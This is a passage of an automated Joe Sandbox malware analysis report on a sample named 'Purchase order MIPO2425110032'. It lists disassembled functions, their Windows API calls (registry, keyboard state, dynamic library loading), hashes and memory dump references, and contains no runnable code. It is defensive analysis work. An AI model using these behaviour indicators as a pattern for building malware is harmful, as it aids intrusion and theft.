                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Process$CloseCountersCurrentHandleOpen
                                                            • String ID:
                                                            • API String ID: 3488606520-0
                                                            • Opcode ID: 26153b84b5bd532cea053015d5cabd50dcff0e84e990c9f357f6b864eae744da
                                                            • Instruction ID: 747e8e91012d04cc7bcfbda4f2b49d0ca9967bea8b965680eccea6cdbc9dea0c
                                                            • Opcode Fuzzy Hash: 26153b84b5bd532cea053015d5cabd50dcff0e84e990c9f357f6b864eae744da
                                                            • Instruction Fuzzy Hash: 82817170A047029FD310DF65C981B4BBBE1BF84704F10892EF6999B3D2DA75E944CB96
                                                            Function 0046B4CF Relevance: 7.7, APIs: 5, Instructions: 157registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B5B5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: ConnectRegistry_memmove_wcslen
                                                            • String ID:
                                                            • API String ID: 15295421-0
                                                            • Opcode ID: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                                            • Instruction ID: 481e56be03c4cee60d8ca92471cfa4b3875eab78bcfcbf7fb961631f720e0f99
                                                            • Opcode Fuzzy Hash: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                                            • Instruction Fuzzy Hash: 7D515F71208301ABD304EF65C885E5BB7A8FF88704F10892EB54597291D774E945CBA6
                                                            Function 00464812 Relevance: 7.6, APIs: 5, Instructions: 145libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadLibraryW.KERNEL32(00000000,?,?,?), ref: 0046485D
                                                            • GetProcAddress.KERNEL32(?,?), ref: 004648F7
                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 00464916
                                                            • GetProcAddress.KERNEL32(?,?), ref: 0046495A
                                                            • FreeLibrary.KERNEL32(?,?,?,?), ref: 0046497C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$Library$FreeLoad
                                                            • String ID:
                                                            • API String ID: 2449869053-0
                                                            • Opcode ID: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                                                            • Instruction ID: 8919579e2c9fc9b2d94c4928dd3202a5bdd7863bc063e44bf2a6fba2f1eed130
                                                            • Opcode Fuzzy Hash: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                                                            • Instruction Fuzzy Hash: 2351BF756002049FCB00EFA4C985A9EB7B4EF88304F14856EFD05AB392DB79ED45CB99
                                                            Function 00456391 Relevance: 7.6, APIs: 5, Instructions: 130keyboardCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCursorPos.USER32(?), ref: 004563A6
                                                            • ScreenToClient.USER32(?,?), ref: 004563C3
                                                            • GetAsyncKeyState.USER32(?), ref: 00456400
                                                            • GetAsyncKeyState.USER32(?), ref: 00456410
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00456466
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: AsyncState$ClientCursorLongScreenWindow
                                                            • String ID:
                                                            • API String ID: 3539004672-0
                                                            • Opcode ID: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                                                            • Instruction ID: 60090bce41a6de58f2ab96a8453d1e3558661e38fd0c916b19f374a884add038
                                                            • Opcode Fuzzy Hash: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                                                            • Instruction Fuzzy Hash: 49414C74504204BBDB24CF65C884EEFBBB8EB46326F60464EFC6593281CB34A944CB68
                                                            Function 0047D40F Relevance: 7.6, APIs: 5, Instructions: 120sleepCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D438
                                                            • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D44D
                                                            • Sleep.KERNEL32(0000000A), ref: 0047D455
                                                            • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D460
                                                            • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D56A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Interlocked$DecrementIncrement$Sleep
                                                            • String ID:
                                                            • API String ID: 327565842-0
                                                            • Opcode ID: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                                            • Instruction ID: e00c67d4cb89bf1d5311357fb713975cbca1e0cfcee7190b0451066ade77f289
                                                            • Opcode Fuzzy Hash: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                                            • Instruction Fuzzy Hash: CC412571A002055FEB10DF65CD84AEE7774EF45304B10852EF609A7351E738EE46CB99
                                                            Function 0045C3C1 Relevance: 7.6, APIs: 5, Instructions: 118COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetPrivateProfileSectionW.KERNEL32(00000000,?,?,00007FFF), ref: 0045C44F
                                                            • GetPrivateProfileSectionW.KERNEL32(00000000,00000003,?,00000003), ref: 0045C477
                                                            • WritePrivateProfileSectionW.KERNEL32(00000000,00000003,?), ref: 0045C4C3
                                                            • WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0045C4E7
                                                            • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0045C4F6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: PrivateProfile$SectionWrite$String
                                                            • String ID:
                                                            • API String ID: 2832842796-0
                                                            • Opcode ID: a5613791a7b7745f301c2db32c82459f4eb77f00fff265897707edd8741bbf57
                                                            • Instruction ID: 1eb5009190fa999c36a74edd43b7bd9b51adbc8f8691a9c3f5840d50e9073e8b
                                                            • Opcode Fuzzy Hash: a5613791a7b7745f301c2db32c82459f4eb77f00fff265897707edd8741bbf57
                                                            • Instruction Fuzzy Hash: D1413075A00209BFDB10EFA1DC85FAAB7A8BF44305F10855EF9049B292DA79EE44CB54
                                                            Function 00441C7B Relevance: 7.6, APIs: 5, Instructions: 108registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00441CA9
                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00441CDD
                                                            • RegCloseKey.ADVAPI32(?), ref: 00441CFE
                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00441D40
                                                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00441D6E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Enum$CloseDeleteOpen
                                                            • String ID:
                                                            • API String ID: 2095303065-0
                                                            • Opcode ID: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                                            • Instruction ID: 7ca4c7ada97503ad9332fce322fe5d5fc03c2789ff93db080e75f28165cdf273
                                                            • Opcode Fuzzy Hash: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                                            • Instruction Fuzzy Hash: 69317CB2940108BAEB10DBD4DC85FFEB77CEB49304F04456EF605A7241D774AA858BA8
                                                            Function 00436A0B Relevance: 7.6, APIs: 5, Instructions: 103COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetWindowRect.USER32(?,?), ref: 00436A24
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: RectWindow
                                                            • String ID:
                                                            • API String ID: 861336768-0
                                                            • Opcode ID: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                                            • Instruction ID: 0a42da3bb0701689e96ef39581243ed39d97d4ba46bd7cd8c1f057aae640e0d3
                                                            • Opcode Fuzzy Hash: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                                            • Instruction Fuzzy Hash: E531EA7160021EAFDB00DF68D988AAE77A5EB49324F11C62AFD24E7380D774EC11CB90
                                                            Function 00449555 Relevance: 7.6, APIs: 5, Instructions: 96windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32 ref: 00449598
                                                              • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                                            • SendMessageW.USER32(?,00001074,?,?), ref: 004495F8
                                                            • _wcslen.LIBCMT ref: 0044960D
                                                            • _wcslen.LIBCMT ref: 0044961A
                                                            • SendMessageW.USER32(?,00001074,?,?), ref: 0044964E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$_wcslen$_wcspbrk
                                                            • String ID:
                                                            • API String ID: 1856069659-0
                                                            • Opcode ID: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                                                            • Instruction ID: 683be220b4a5e9d86ccbf412c3bd2f13dbb60120779f28b1c577ab6eeef24407
                                                            • Opcode Fuzzy Hash: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                                                            • Instruction Fuzzy Hash: 77318F71A00218ABEB20DF59DC80BDFB374FF94314F10466AFA0497280E7B59D958B94
                                                            Function 004478AC Relevance: 7.6, APIs: 5, Instructions: 96windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCursorPos.USER32(?), ref: 004478E2
                                                            • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478FC
                                                            • DefDlgProcW.USER32(?,0000007B,?,?), ref: 0044791D
                                                            • GetCursorPos.USER32(00000000), ref: 0044796A
                                                            • TrackPopupMenuEx.USER32(00A06370,00000000,00000000,?,?,00000000), ref: 00447991
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: CursorMenuPopupTrack$Proc
                                                            • String ID:
                                                            • API String ID: 1300944170-0
                                                            • Opcode ID: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                                            • Instruction ID: 8079d3ea29232e2d8a780d7c6517a0c600664366e77620ab1eef72d1e193e80f
                                                            • Opcode Fuzzy Hash: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                                            • Instruction Fuzzy Hash: EF31CF75600108AFE724CF59DC88FABB768EB89310F20455AF94587391C775AC53CBA8
                                                            Function 004479A0 Relevance: 7.6, APIs: 5, Instructions: 96COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetClientRect.USER32(?,?), ref: 004479CC
                                                            • GetCursorPos.USER32(?), ref: 004479D7
                                                            • ScreenToClient.USER32(?,?), ref: 004479F3
                                                            • WindowFromPoint.USER32(?,?), ref: 00447A34
                                                            • DefDlgProcW.USER32(?,00000020,?,?), ref: 00447AAD
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Client$CursorFromPointProcRectScreenWindow
                                                            • String ID:
                                                            • API String ID: 1822080540-0
                                                            • Opcode ID: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                                            • Instruction ID: a7e7621e8492875af53c289f1ad187460d50aec5ad556b3834d9a5cb4abdf121
                                                            • Opcode Fuzzy Hash: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                                            • Instruction Fuzzy Hash: B831A2741082029FE710DF69D884D7FB7A4FB89314F144A1EF850D7291D774E946CBA6
                                                            Function 00447BF1 Relevance: 7.6, APIs: 5, Instructions: 95COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetWindowRect.USER32(?,?), ref: 00447C5D
                                                            • ScreenToClient.USER32(?,?), ref: 00447C7B
                                                            • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                                            • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                                            • EndPaint.USER32(?,?), ref: 00447D13
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: ClientPaintRectRectangleScreenViewportWindow
                                                            • String ID:
                                                            • API String ID: 659298297-0
                                                            • Opcode ID: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                                                            • Instruction ID: 3c0582d8bc81ba5dadaaf244cb1f1d3939805113443e317e1f98b5bdeebaec33
                                                            • Opcode Fuzzy Hash: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                                                            • Instruction Fuzzy Hash: C33161706043019FE310CF25D8C8F7B7BE8EB86724F144A6EF9A5872A1C774A845DB69
                                                            Function 004487EA Relevance: 7.6, APIs: 5, Instructions: 89COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                            • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                            • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                            • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                            • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                              • Part of subcall function 00440D98: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00440DB8
                                                              • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440DFA
                                                              • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440E3A
                                                              • Part of subcall function 00440D98: SendMessageW.USER32(00A01A78,000000F1,00000000,00000000), ref: 00440E6E
                                                              • Part of subcall function 00440D98: SendMessageW.USER32(00A01A78,000000F1,00000001,00000000), ref: 00440E9A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Window$EnableMessageSend$LongShow
                                                            • String ID:
                                                            • API String ID: 142311417-0
                                                            • Opcode ID: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                                                            • Instruction ID: c941ec4e4e3d0536419715940b2668e48b64c275bb9f23e9dd6fd7b29375311a
                                                            • Opcode Fuzzy Hash: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                                                            • Instruction Fuzzy Hash: DE21F7B17443805BF7258E24CCC4BAFB7D0EF56345F08482EF98196391DBACA885C75A
                                                            Function 004550FC Relevance: 7.6, APIs: 5, Instructions: 78COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                                            • Instruction ID: af34b986bc09d21a6a739d25b45c5a22770885c200d938a8bd6fc5fff5094107
                                                            • Opcode Fuzzy Hash: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                                            • Instruction Fuzzy Hash: 5921AE75200600DBC710EF29E9D496B77B9EF49362B00466EFE5197392DB34EC09CB69
                                                            Function 00445870 Relevance: 7.6, APIs: 5, Instructions: 78windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • IsWindowVisible.USER32(?), ref: 00445879
                                                            • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00445893
                                                            • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004458CD
                                                            • _wcslen.LIBCMT ref: 004458FB
                                                            • CharUpperBuffW.USER32(00000000,00000000), ref: 00445905
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
